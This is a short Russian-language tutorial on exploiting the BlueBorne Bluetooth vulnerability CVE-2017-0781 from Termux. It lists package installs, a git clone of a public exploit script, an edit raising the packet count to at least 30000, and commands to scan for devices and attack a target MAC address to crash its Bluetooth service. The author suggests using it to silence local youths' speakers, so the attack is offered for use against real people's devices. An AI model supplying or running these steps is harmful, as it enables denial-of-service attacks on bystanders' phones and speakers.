Blueborne
Termux SuBlueborne - это общее название восьми уязвимостей службы Bluetooth, которые могут привести к утечке данных, RCE и т.д. Переполнение буфера также относится к этому списку, и оно, в свою очередь, приводит к отказу Bluetooth на целевом устройстве.
Код данной уязвимости в базе CVE - CVE-2017-0781. Автоматизированный скрипт для её эксплуатации есть на Github, воспользуемся им для проведения тестовой атаки.
Установка и настройка:
apt-get update
apt-get install python2.7 python-pip python-dev git libssl-dev libffi-dev build-essential
pip install --upgrade pip
pip install --upgrade pwntools
apt-get install bluetooth libbluetooth-dev
pip install pybluez
git clone https://github.com/ojasookert/CVE-2017-0781
В скачанном python файле нужно подкорректировать количество пакетов, изменив переменную count до 30000 минимум.
Использование:
hcitool scan
python CVE-2017-0781.py TARGET=<MAC адрес>
Как итог на атакуемое устройство начнут посылаться запросы, тем самым переполняя буфер, что приведет к ошибкам и отключению службы. Крайне "удобный" способ заглушить колону местной шпане
Да, есть и его альтернатива в виде "nRF-Connect", но тот уже тянет на отдельную статью)))